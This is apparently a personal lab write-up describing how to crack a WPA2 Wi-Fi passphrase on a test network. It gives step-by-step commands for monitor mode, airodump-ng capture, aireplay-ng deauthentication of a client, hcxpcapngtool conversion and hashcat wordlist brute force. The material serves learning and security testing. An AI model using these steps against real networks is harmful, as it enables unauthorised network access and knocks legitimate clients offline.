Capturing and Breaking WPA2 Wi-Fi Passwords Via 4-way-handshake

As a kid, and even as I’ve gotten older, I’ve always been fascinated by movies—especially the ones that make it seem so easy to break into someone’s Wi-Fi. This curiosity led me on a personal journey to see if it’s really that simple.

What I found was surprising: before WPA2, it truly was that easy. However, with the improvements made in WPA2, and the upcoming WPA3, the days of breaking in within a couple of minutes are coming to an end.

With that in mind, I decided to put together a quick write-up and report on what I did and how it turned out. If you’re curious or want to try it yourself, feel free to reach out with any questions!

Description of the Simulated Network:

For this demonstration, we utilized a computer running a live version of Kali Linux. The setup included the following components:

1. Router/Access Point (AP): A modern wireless router configured for testing purposes, using WPA2.

2. Client Device: A wireless-enabled device acting as the target for the attack. Should be already connected to the Access Point.

3. Wireless Adapter: A compatible adapter capable of monitor mode and packet injection.

Topology Diagram/Network Map:

The topology consisted of a single Access Point (AP) with connected client devices. The attacking device was positioned to monitor and interfere with the communication between the AP and its clients. Please refer to Figure 2.1 For additional information and clarification.

Step-by-Step Attack Execution

We will now begin the exploitation process. During this process, we will:

1. Prepare the Environment: Set up the tools and configure the wireless adapter.

   
   

2. Identify a Target: Locate and choose an access point and a client device within range.

   
   

3. Deauthenticate the Client: Force the client to disconnect from the access point using packet injection.

   
   

4. Capture the Handshake: Monitor the connection and capture the WPA handshake packets during reconnection.

   
   

5. Brute Force the Passphrase: Use a wordlist to attempt cracking the captured handshake.

Preparing the Environment

Before starting any steps, we must ensure that our environment is properly configured. This includes shutting down any currently running network-related services that might affect the wireless adapter’s performance or configuration. As well as putting the Wireless Interface into monitor mode to be able to capture traffic.

The following steps will use a "What" heading to describe the task and a "How To" command to show the exact steps.

1. Shut down interfering services:

   1. systemctl stop wpa_supplicant NetworkManager

      
      

2. Identify the wireless interface:

   1. Iwconfig

Identifying a Target

We will not identify our Target. For this We will use a tool called FERN-wifi-cracker as it is able to quickly condense this initial step into an easy to use GUI. During this step we will identify and record the following: Channel: The Accessess point current channel, BSSID: of the Access Point, and a MAC: address of the client (Station).

Because of FERN being a GUI tool, please refer to figure 2, and 3 for clarification and visual assistance.

1. Start FERN

2. Select Previously Identified Wireless Interface

3. Begin Scan

4. Identify SSID to attack

5. Identify Client to Deauthenticate

6. Be sure to end FERN and release the interface
   

   

Capturing the Handshake

In this step, we will deauthenticate the client, forcing it to reauthenticate, while monitoring the packets to capture the four-way handshake between the client and the access point.

1. Open a terminal, Optionally you can open 2 in order to simplify the process

2. Place Interface into Monitor Mode

   1. Disable the interface:

      1. ifconfig <Interface Name> down

   2. Enable monitor mode:

      1. iwconfig <Interface Name> mode monitor

   3. Reactivate the interface:

      1. ifconfig <Interface Name> up

         
         

3. Start Monitoring for the specific handshake:

   1. sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_file> wlan0mon

      
      

4. Deauthenticate a client to force the reauthentication and the sending of the handshake: “Note: This may take multiple attempts as the station must receive the deauthentication to be able to reauthenticate, we must also capture the handshake, which may not occur on every reconnect.”

   1. sudo aireplay-ng --deauth 10 -a <BSSID> -c <StationID> wlan0mon

      
      

5. Confirm handshake capture:

   1. You may see something in the airodump-ng output along the lines of Eapol.

   2. You can also check the cap file for the handshake capture.

      1. Wireshark <location of outputfile.cap>.

         1. Once opened, filter for Eapol.

            
            

Converting Handshake for Brute Force

While the .cap can be used to brute force, the better of the option is to use a utility called hashcat which will automatically use GPU acceleration and multithreading to spead up the attempts.

1. Convert the .cap file to a Hashcat-compatible format using hcxpcapngtool:

   1. hhcxpcapngtool -o handshake.22000 handshake-01.cap

2. Confirm the converted file format:

   1. cat handshake.22000

Brute-Forcing the Passphrase

Using the captured handshake, and Hashcat we can now attempt to brute force the caught hash of the passphrase. While the time and list used may vary depending on the complexity of the passphrase, or the individual's hardware, the actual process would remain the same.

1. Run Hashcat to attempt cracking the passphrase:

   1. hashcat -m 22000 handshake.22000 /usr/share/wordlists/rockyou.txt

2. View the results upon completion:

   1. hashcat --show -m 22000 handshake.22000

Troubleshooting

While attempting to capture the handshake or during the brute-forcing process, there are many small things that might not work quite right. Below is one of the challenges one might encounter and its corresponding fix.

Problem: Channel hopping issues or not capturing enough of the handshake. If a NIC is attempting to channel hop, the actual handshake packets may be missed, or only a single packet might be captured during monitoring.

Solution: There are a couple of options available to resolve this issue. First, you should try and identify the service currently forcing the wireless adapter to change channels, and disable it. Alternatively, you can attempt to lock the wireless adapter to a single channel using iwconfig with the following command: command: sudo iwconfig wlan0mon channel <channel_number>

Video Demonstration

Below is a video demonstration of the deauthentication process, handshake capture, confirmation via packet inspection, and brute-forcing the password using Hashcat. The password was brute-forced offline, and for this example, it was deliberately placed in the middle of the RockYou.txt wordlist.